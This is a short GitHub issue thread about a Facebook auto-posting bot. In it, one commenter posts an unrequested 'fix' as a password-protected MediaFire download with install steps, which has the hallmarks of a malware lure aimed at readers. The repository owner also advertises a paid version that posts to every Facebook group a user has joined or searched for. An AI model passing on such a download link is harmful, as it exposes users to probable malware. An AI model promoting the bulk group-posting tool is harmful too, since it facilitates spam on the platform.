### ISSUE TITLE
requests

### ISSUE THREAD

**Issue by athyran** [dafidxcode/BotFB#1]
auto post image ada om?

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dafidxcode** [comment]
Ada tapi premium only, support post gambar/link/text ke semua group (group yg udah bergabung ataupun berdasarkan target percarian nama)
Chat ke sini https://fb.me/dafidxcode
